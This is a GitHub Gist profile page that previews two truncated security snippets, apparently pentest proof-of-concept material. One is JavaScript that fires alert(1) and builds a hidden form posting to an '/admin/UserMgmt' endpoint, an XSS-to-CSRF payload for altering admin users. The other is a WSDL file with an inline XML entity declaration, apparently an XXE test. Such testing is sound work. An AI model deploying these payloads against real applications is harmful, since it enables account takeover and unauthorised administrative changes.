Skip to content

Instantly share code, notes, and snippets.

View Fisjkars's full-sized avatar

Maxime Escourbiac Fisjkars

  • Michelin
  • Clermont-Ferrand
View GitHub Profile
alert(1);
// Create a form dynamically
var form = document.createElement("form");
form.setAttribute("id", "certmichelin");
form.setAttribute("method", "post");
form.setAttribute("action", "/admin/UserMgmt");
// Create an input element for Full Name
var at = document.createElement("input");
at.setAttribute("type", "hidden");
at.setAttribute("name", "1146site");
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<definitions name = "HelloService"
targetNamespace = "http://www.examples.com/wsdl/HelloService.wsdl"
xmlns = "http://schemas.xmlsoap.org/wsdl/"
xmlns:soap = "http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:tns = "http://www.examples.com/wsdl/HelloService.wsdl"
xmlns:xsd = "http://www.w3.org/2001/XMLSchema">
<message name = "SayHelloRequest">
<part name = "firstName" type = "xsd:string"/>